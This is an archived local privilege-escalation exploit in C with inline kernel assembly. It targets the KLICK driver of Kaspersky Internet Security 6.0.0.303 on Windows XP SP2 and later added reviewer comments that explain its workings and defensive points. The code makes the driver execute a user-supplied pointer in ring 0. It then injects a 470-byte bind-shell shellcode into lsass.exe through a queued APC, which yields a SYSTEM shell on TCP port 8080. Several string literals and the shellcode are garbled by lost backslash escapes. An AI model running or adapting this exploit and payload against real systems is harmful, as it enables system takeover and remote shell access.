
# Title : Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit
# Published : 2006-10-29
# Author : Nanika
# Previous Title : Xcode OpenBase <= 10.0.0 (unsafe system call) Local Root Exploit (OSX)
# Next Title : XMPlay 3.3.0.4 (M3U Filename) Local Buffer Overflow Exploit


////////////////////////////////////
///// AVP (Kaspersky) 
////////////////////////////////////
//// FOR EDUCATIONAL PURPOSES ONLY
//// Kernel Privilege Escalation #2
//// Exploit
//// Rubén Santamarta 
//// www.reversemode.com
//// 01/09/2006
////
////
////Modify by Nanika
////naninb[at]gmail.com
////nanika[at]chroot.org
////Exploit Get SYSTEM SHELL PORT 8080
////WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303
////Do not Enable Hardware DEP
////Reference:
////http://hitcon.org/download/2005/Windows_Kernel_Shellcode_Exploit.pdf
////http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf
////http://www.security.org.sg/code/sdtrestore.html
////http://www.reversemode.com/
////
////
////
////I AM NOT Japanese :P
////¡ì?¡À?¡¥¨¤¦Ì1¡è@¡§???¡§sKernel Exploitao¡èH|3¡è@¡§?¨¤¡ã¡ìU
////¡è¨¤¡§¨¦?O|3¡¥qao
////////////////////////////////////
// Emits the two-byte SYSENTER opcode (0F 34) as inline asm. Not referenced anywhere in this listing.
#define sysenter __asm __emit 0x0f __asm __emit 0x34



#include <windows.h>
#include <stdio.h>

// NTSTATUS values and kernel-side constants normally provided by the DDK headers; redeclared here
// because only the user-mode SDK header (<windows.h>) is included.
#define STATUS_SUCCESS					((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH		((NTSTATUS)0xC0000004L)	// getKernelBase treats this as "buffer too small" and doubles the buffer
#define OBJ_CASE_INSENSITIVE			0x00000040L				// unused in this listing
#define PAGE_READONLY					0x02					// unused here; <windows.h> already defines it with the same value
#define PAGE_READWRITE					0x04					// unused here; <windows.h> already defines it with the same value
#define DEF_KERNEL_BASE					0x80400000L				// fallback ntoskrnl base returned by getKernelBase when the module list cannot be read
#define	SystemModuleInformation			11						// SYSTEM_INFORMATION_CLASS value passed to ZwQuerySystemInformation
#define PROT_MEMBASE					0x80000000				// unused in this listing

typedef LONG	NTSTATUS;	// NT status code; only compared against the two STATUS_* values above

// One record of the SystemModuleInformation list returned by ZwQuerySystemInformation (XP-era,
// undocumented layout). getKernelBase reads the buffer as a DWORD record count followed by these
// records, and uses only Base and ImageName.
typedef struct _SYSTEM_MODULE_INFORMATION
{
	ULONG Reserved[2];
	PVOID Base;					// kernel-mode load address of the module
	ULONG Size;
	ULONG Flags;
	USHORT Index;
	USHORT Unknown;
	USHORT LoadCount;
	USHORT ModuleNameOffset;	// presumably the offset of the bare file name inside ImageName - not used by this listing
	CHAR ImageName[256];		// module name as reported by the kernel; compared with strcmpi() in getKernelBase
} SYSTEM_MODULE_INFORMATION;

// ZwQuerySystemInformation, resolved from ntdll.dll at run time by getNativeAPIs(); NULL until then.
NTSTATUS (WINAPI * _NtQuerySystemInformation)(UINT, PVOID, ULONG, PULONG);


HINSTANCE base;				// user-mode LoadLibrary() mapping of ntoskrnl.exe; used in main() only to rebase exports

DWORD *kbase;				// kernel-mode base of ntoskrnl.exe as reported by getKernelBase()
// Kernel-mode addresses of the four ntoskrnl exports called from the inline asm in Ring0Function().
// main() computes each as (user-mode export address - user-mode base + kbase).
int *ExAllocatePool;
int *KeInitializeApc;
int *KeInsertQueueApc;
int *ZwYieldExecution;


// User-mode stage. The author describes it as a bind-shell payload listening on TCP 8080 and gives
// its length as 470 (0x1d6) bytes, which matches the copy length used in Ring0Function(). Ring0Function
// copies these bytes to 0xffdf0800 (kernel alias of the page user mode sees at 0x7ffe0800, per the
// author's comment) and queues that address as the user-mode routine of an APC in the target process.
// NOTE(review): as transcribed, the "x90..." literals have lost their backslash escapes, so the array
// as printed holds the ASCII text of the hex dump, not the bytes it documents.
unsigned char code[] =
//USER MODE Shellcode bind port 8080
//470bytes
"x90x90x90x90x90"
"x83xecx34x8bxf4xe8x47x01x00x00x89x06xffx36x68x8e"
"x4ex0execxe8x61x01x00x00x89x46x08xffx36x68xadxd9"
"x05xcexe8x52x01x00x00x89x46x0cx68x6cx6cx00x00x68"
"x33x32x2ex64x68x77x73x32x5fx54xffx56x08x89x46x04"
"xffx36x68x72xfexb3x16xe8x2dx01x00x00x89x46x10xff"
"x36x68x7exd8xe2x73xe8x1ex01x00x00x89x46x14xffx76"
"x04x68xcbxedxfcx3bxe8x0ex01x00x00x89x46x18xffx76"
"x04x68xd9x09xf5xadxe8xfex00x00x00x89x46x1cxffx76"
"x04x68xa4x1ax70xc7xe8xeex00x00x00x89x46x20xffx76"
"x04x68xa4xadx2exe9xe8xdex00x00x00x89x46x24xffx76"
"x04x68xe5x49x86x49xe8xcex00x00x00x89x46x28xffx76"
"x04x68xe7x79xc6x79xe8xbex00x00x00x89x46x2cx33xff"
"x81xecx90x01x00x00x54x68x01x01x00x00xffx56x18x50"
"x50x50x50x40x50x40x50xffx56x1cx8bxd8x57x57x68x02"
"x00x1fx90x8bxccx6ax16x51x53xffx56x20x57x53xffx56"
"x24x57x51x53xffx56x28x8bxd0x68x65x78x65x00x68x63"
"x6dx64x2ex89x66x30x83xecx54x8dx3cx24x33xc0x33xc9"
"x83xc1x15xabxe2xfdxc6x44x24x10x44xfex44x24x3dx89"
"x54x24x48x89x54x24x4cx89x54x24x50x8dx44x24x10x54"
"x50x51x51x51x6ax01x51x51xffx76x30x51xffx56x10x8b"
"xccx6axffxffx31xffx56x0cx8bxc8x57xffx56x2cxffx56"
"x14x55x56x64xa1x30x00x00x00x85xc0x78x0cx8bx40x0c"
"x8bx70x1cxadx8bx68x08xebx09x8bx40x34x8bxa8xb8x00"
"x00x00x8bxc5x5ex5dxc2x04x00x53x55x56x57x8bx6cx24"
"x18x8bx45x3cx8bx54x05x78x03xd5x8bx4ax18x8bx5ax20"
"x03xddxe3x32x49x8bx34x8bx03xf5x33xffxfcx33xc0xac"
"x3axc4x74x07xc1xcfx0dx03xf8xebxf2x3bx7cx24x14x75"
"xe1x8bx5ax24x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8b"
"x04x8bx03xc5xebx02x33xc0x8bxd5x5fx5ex5dx5bxc2x04"
"x00";

/*
 * Ring0Function - body that ends up executing in kernel mode.
 *
 * main() passes the address of this function to the KLICK driver as the only input word of IOCTL
 * 0x80052110; according to the author the driver then calls that user-supplied pointer from ring 0
 * without validating it. It is therefore not used as an ordinary C function: it never returns to a
 * C caller, and leaves through iretd at the end of the __asm block.
 *
 * Steps (all structure offsets are hard-coded for 32-bit Windows XP SP2, see the header notes):
 *   1. Find the current process object and walk the active-process list to the entry whose image
 *      name starts with "lsas".
 *   2. Copy the 0x1d6-byte user-mode payload (code[]) to 0xffdf0800, the kernel alias of the page
 *      user mode sees at 0x7ffe0800 (author's comment).
 *   3. Pick a waiting thread of that process, allocate a KAPC with ExAllocatePool, initialise it with
 *      0x7ffe0800 as the user-mode routine (KeInitializeApc) and queue it (KeInsertQueueApc), so the
 *      payload runs in the context of the selected process.
 *   4. Return to user mode with iretd.
 *
 * Implicit register contract: edi must point at writable memory on entry (nothing in this listing
 * sets it - presumably provided by the driver's IOCTL dispatch context; confirm). No registers or
 * flags are preserved; none need to be, since control never comes back to the C caller.
 *
 * Defensive notes: the root cause is a driver IOCTL handler that calls a pointer supplied by an
 * unprivileged user-mode caller. Executing user-mode addresses from ring 0 is exactly what
 * supervisor-mode execution prevention blocks on later hardware/OS versions, and the author's
 * "Do not Enable Hardware DEP" remark points at the same dependency (presumably the payload executes
 * from a data page). On an affected host the observable effect described by the author is a new
 * listener on TCP 8080 in the target process.
 */
void Ring0Function()
{
	/*
     printf("----[RING0]----n");
     printf("Hello From Ring0!n");
     printf("----[RING0]----nn");
	 WinExec("cmd.exe",SW_SHOW);
	 */
 __asm
    {
     // leading padding (author's)
     nop
     nop
     nop
     nop
     nop
     nop
     nop
     nop

/*start here*/


    // 1. In ring 0 fs addresses the KPCR; the author labels fs:[0x124] "TEB", but at that offset it is
    //    presumably the current thread object (KPCR.PrcbData.CurrentThread) - confirm. [eax+0x44] is
    //    then the thread's owning process (author: EPROCESS).
    mov        eax,fs:[0x124]//TEB
    mov        esi,[eax+0x44]//EPROCESS
    mov        eax,esi

    
    // Walk the process list (links at +0x88, hence the sub to get back to the object start) until the
    // image name at +0x174 begins with "lsas" ('sasl' is that string read as a little-endian dword).
search:
    mov        eax,[eax+0x88]   //activeprocess
    sub        eax,0x88


   // cmp        dword ptr[eax+0x84],0x444//EPROCESS_PID
	cmp dword ptr[eax+0x174],'sasl'//FileName lsass.exe
    jne        search
   
   // mov        ebx,dword ptr[eax+0xc8]//system token
    mov  ebx,eax
    
   

    // 2. Copy the user-mode payload. edi is an implicit input (see header); its value is saved and
    //    restored around the copy, and the destination pointer 0xffdf0800 is first stored through it.
	lea  esi,code//code

    mov ecx,0x1d6// code = 0x1d6

	mov dword ptr[edi],0xffdf0800//Kernel ffdf0000=user 7ffe0000
	push edi
	mov edi,[edi]
	rep movsb
	pop edi


    // 3. From the process's thread list (+0x190) take the first entry whose state byte (at -0x1ff from
    //    the list entry, per author) equals 5 = waiting, and recover the thread object (entry - 0x22c).
    mov        ecx,dword ptr[ebx+0x190]
finddelay:
	mov ecx,[ecx]
    cmp byte ptr[ecx-0x1ff],0x5//1ff =ethread list - state 0x5=wait
	jnz finddelay
    sub ecx,0x22c
    mov ebp,ecx

    // ExAllocatePool(PoolType=0 /*NonPagedPool*/, NumberOfBytes=0x30 /*sizeof KAPC*/); arguments
    // are pushed right-to-left; the result (esi) is not checked for NULL.
	push 0x30//APC Object sizeof
	push 0 //Nonpage
	mov eax,ExAllocatePool//ExAllocatePool for APC Object
    call eax//call ExAllocatePool
    mov esi,eax
    // KeInitializeApc(Apc=esi, Thread=ebp, Environment=0, KernelRoutine=ZwYieldExecution (used as a
    // do-nothing kernel routine), RundownRoutine=0, NormalRoutine=0x7ffe0800 (the copied payload),
    // ApcMode=1 /*UserMode*/, NormalContext=0)
	xor edx,edx
	push edx//NULL
	push 01//UserMode
//	push dword ptr[edi]//user mode shellcode
    mov eax,0x7ffe0800//user mode shellcode
    push eax//User Mode routine
	push edx//NULL
	mov eax,ZwYieldExecution//0x804dd668//804dd237=kernel routine ret
	push eax//Kernel Mode routine
	push edx//NULL
	push ebp//ETHREAD
	push esi//APC object
	mov eax,KeInitializeApc  //initialize APC
	call eax


    // KeInsertQueueApc(Apc=esi, SystemArgument1=ebp, SystemArgument2=0, Increment=0). The author's
    // "ETHREAD" comment refers to what is passed as SystemArgument1; the return value is not checked
    // (see the commented-out test below).
	xor ecx,ecx
	xor edx,edx
    xor eax,eax
    push eax
	push eax
	push ebp//ETHREAD
	push esi//APC Object
	mov eax,KeInsertQueueApc
	call eax

//    test eax,eax
//	jz recall

    // Sets a byte at +0x4a in the selected thread object; presumably the flag marking a user-mode APC
    // as pending so it is delivered on that thread's next return to user mode - confirm.
	mov byte ptr[ebp+0x4a],0x1

/*
	push 0x80000000
	push 0
	push 0
	mov eax,0x804dd4b8
	call eax
*/
/*
yeldloop:
	mov eax,0x804df4d5
	call eax
	jmp yeldloop
*/

    // 4. Leave ring 0 using whatever return frame is on the stack at this point (assumed to be the
    //    one the driver's entry path left there). Nothing below is meant to execute.
    iretd
/*end here*/
     int 3                              // trap if execution ever falls through
     NOP
     NOP
     NOP
     NOP
     NOP
     NOP
     NOP
     NOP
     
    }

     exit(1);                           // should not be reached: the asm block exits via iretd
	 //printf("WindowsXP Version :Pnn");
}
/*
 * getNativeAPIs - resolve ZwQuerySystemInformation from the already-loaded ntdll.dll.
 *
 * Stores the address in the global _NtQuerySystemInformation.
 * Returns TRUE on success, FALSE if the lookup failed (the global is then NULL). The result of
 * GetModuleHandle is not checked; a NULL module handle is expected to make GetProcAddress fail,
 * which the same test covers.
 * NOTE(review): main() ignores this return value, so on failure getKernelBase() calls through a
 * NULL function pointer.
 */
BOOL getNativeAPIs(void)
{
HMODULE hntdll;

hntdll = GetModuleHandle("ntdll.dll");

	*(FARPROC *)&_NtQuerySystemInformation =
		GetProcAddress(hntdll, "ZwQuerySystemInformation");

if(_NtQuerySystemInformation)
{
		return TRUE;
	}
	return FALSE;

}


/*
 * getKernelBase - read the kernel-mode load address of ntoskrnl.exe from the loaded-module list.
 *
 * Calls _NtQuerySystemInformation(SystemModuleInformation) into a process-heap buffer, starting at
 * 0x8000 bytes and doubling while the call reports STATUS_INFO_LENGTH_MISMATCH. The filled buffer is
 * then read as a DWORD record count followed by SYSTEM_MODULE_INFORMATION records.
 *
 * Returns the Base of the selected record, or DEF_KERNEL_BASE (0x80400000) if allocation fails, the
 * query fails for any other reason, or no record is selected.
 * Requires getNativeAPIs() to have succeeded; the function pointer is used unchecked.
 */
DWORD getKernelBase(void)
{
	HANDLE hHeap = GetProcessHeap();
	
	NTSTATUS Status;
    ULONG cbBuffer = 0x8000;			// initial size, doubled on each length mismatch
    PVOID pBuffer = NULL;
	DWORD retVal = DEF_KERNEL_BASE;		// fallback if the loop below selects nothing

    do
    {
		pBuffer = HeapAlloc(hHeap, 0, cbBuffer);
		if (pBuffer == NULL)
			return DEF_KERNEL_BASE;

		// ReturnLength is not requested (NULL), so the required size is found by doubling.
		Status = _NtQuerySystemInformation(SystemModuleInformation,
					pBuffer, cbBuffer, NULL);

		if(Status == STATUS_INFO_LENGTH_MISMATCH)
		{
			HeapFree(hHeap, 0, pBuffer);
			cbBuffer *= 2;
		}
		else if(Status != STATUS_SUCCESS)
		{
			HeapFree(hHeap, 0, pBuffer);
			return DEF_KERNEL_BASE;
		}
    }
    while (Status == STATUS_INFO_LENGTH_MISMATCH);

	// Buffer layout: DWORD count, then count records (see SYSTEM_MODULE_INFORMATION).
	DWORD numEntries = *((DWORD *)pBuffer);
	SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)((char *)pBuffer + sizeof(DWORD));

	for(DWORD i = 0; i < numEntries; i++)
	{
		// NOTE(review): strcmpi() returns 0 on a match, so this branch is taken for the first record
		// whose ImageName does NOT compare equal to the literal; which record that is depends on the
		// order and name format the OS returns (the author evidently relies on it being the kernel).
		if(strcmpi(smi->ImageName, "ntoskrnl.exe"))
		{
			// The trailing "n" in the format string is a "\n" whose backslash was lost in transcription.
			printf("%.8X - %sn", smi->Base, smi->ImageName);
			retVal = (DWORD)(smi->Base);
			break;
		}
		smi++;
	}

	HeapFree(hHeap, 0, pBuffer);

	return retVal;
}
/*
 * ShowError - report the last Win32 error in a message box and terminate the process.
 *
 * Formats GetLastError() via FormatMessage (system message table, buffer allocated by the call),
 * shows it with MessageBoxA and exits with status 1. Never returns. The FormatMessage buffer is not
 * released, which does not matter because the process exits immediately.
 * The LPTSTR casts assume an ANSI (non-UNICODE) build, consistent with the char* literals used
 * throughout this file.
 */
VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}

/*
 * main - user-mode driver.
 *
 * Flow:
 *   1. Print the banner and refuse to run unless GetVersionEx reports 5.1 (Windows XP); the
 *      structure offsets hard-coded in Ring0Function are only valid there.
 *   2. Resolve ZwQuerySystemInformation, read the real ntoskrnl base, and derive kernel-mode
 *      addresses of ExAllocatePool/KeInitializeApc/KeInsertQueueApc/ZwYieldExecution by rebasing the
 *      exports of a user-mode LoadLibrary() mapping of ntoskrnl.exe.
 *   3. Open the KLICK device and send IOCTL 0x80052110 with the address of Ring0Function as the input
 *      buffer; per the author, the driver calls that pointer in kernel mode.
 *
 * Decoding the IOCTL code: device type 0x8005, function 0x844, METHOD_BUFFERED, FILE_ANY_ACCESS -
 * which is why a handle opened with desired access 0 is enough to reach it. A driver that exposes a
 * sensitive operation this way should at least require a specific access right and validate every
 * pointer it receives from the buffer.
 *
 * NOTE(review), as written:
 *   - the results of getNativeAPIs(), LoadLibrary() and the four GetProcAddress() calls are unchecked;
 *   - InBuff holds one DWORD (4 bytes) but 0x8 is passed as the input length, so the IOCTL reads
 *     4 bytes past the array; InSize and OutSize are assigned/declared but never used;
 *   - there is no return statement on the success path.
 * The backslash escapes of the string literals were lost in transcription ("...n" was "...\n", and
 * the device path as printed would need its backslashes doubled in real source); literals are left
 * exactly as printed.
 */
int main(int argc, char *argv[])
{

 DWORD				InBuff[1];			// single input word: address of Ring0Function
 DWORD				dwIOCTL,OutSize,InSize,junk;	// OutSize and InSize are unused; junk receives the bytes-returned count
 HANDLE				hDevice;
 OSVERSIONINFO ov;

system("cls");
printf("#######################n");
printf("## AVP Ring0 Exploit ##n");
printf("#######################n");
printf("Ruben Santamartanwww.reversemode.comnn");
printf("Modify by Nanikann");
printf("naninb[at]gmail.comn");
printf("www.chroot.orgn");
printf("WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303 :Pn");



	// OS gate: major 5 / minor 1 = Windows XP only.
	ov.dwOSVersionInfoSize = sizeof(ov);
	GetVersionEx(&ov);
	if(ov.dwMajorVersion != 5)
	{
		printf("Sorry, this version supports only WinXP.n");
		return 1;
	}

	if(ov.dwMinorVersion != 1)
	{
		printf("Sorry, this version supports only WinXP.n");
		return 1;
	}
getNativeAPIs();		// return value ignored (see header)

kbase=(unsigned long *)getKernelBase();
base=LoadLibrary("ntoskrnl.exe");	// user-mode mapping, used only to find export RVAs

// Export address in the user-mode mapping, rebased onto the kernel-mode image:
// kernel_addr = user_addr - user_base + kbase. Pointer arithmetic is done on int* so the
// differences are in 4-byte units on both sides and cancel out.
ExAllocatePool=(int *)GetProcAddress(base,"ExAllocatePool");
KeInitializeApc=(int *)GetProcAddress(base,"KeInitializeApc");
KeInsertQueueApc=(int *)GetProcAddress(base,"KeInsertQueueApc");
ZwYieldExecution=(int *)GetProcAddress(base,"ZwYieldExecution");
ExAllocatePool=(int *)((int *)ExAllocatePool - (int *)base+(int *)kbase);
KeInitializeApc=(int *)((int *)KeInitializeApc-(int *)base+(int *)kbase);
KeInsertQueueApc=(int *)((int *)KeInsertQueueApc-(int *)base+(int *)kbase);
ZwYieldExecution=(int *)((int *)ZwYieldExecution-(int *)base+(int *)kbase);
FreeLibrary(base);

// Desired access 0, no sharing, disposition 3 (OPEN_EXISTING), no flags.
hDevice = CreateFile("\\.\KLICK",
                     0,
                     0,
                     NULL,
                     3,
                     0,
                     0);

//////////////////////
///// INFO 
//////////////////////

 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("[!] KLICK Device Handle [%x]n",hDevice);


 
//////////////////////
///// BUFFERS
//////////////////////
 InSize = 0x8;		// never used; the literal 0x8 is passed directly below

 
 InBuff[0] =(DWORD) Ring0Function;  // Ring0 ShellCode Address
 
 //////////////////////
 ///// IOCTL
 //////////////////////

 dwIOCTL = 0x80052110;

 printf("[!] IOCTL [0x%x]nn",dwIOCTL);
 printf("Exploit TEST!!!!!!!!!!nn");
 printf("Telnet x.x.x.x 8080 get SYSTEM shell!!!!!!!!  :Pnn");
 // Input length 0x8 exceeds sizeof(InBuff) == 4 (see header); no output buffer.
 DeviceIoControl(hDevice, 
                 dwIOCTL, 
                 InBuff,0x8,
                 (LPVOID)NULL,0,
                 &junk,  
                 NULL);


 
}
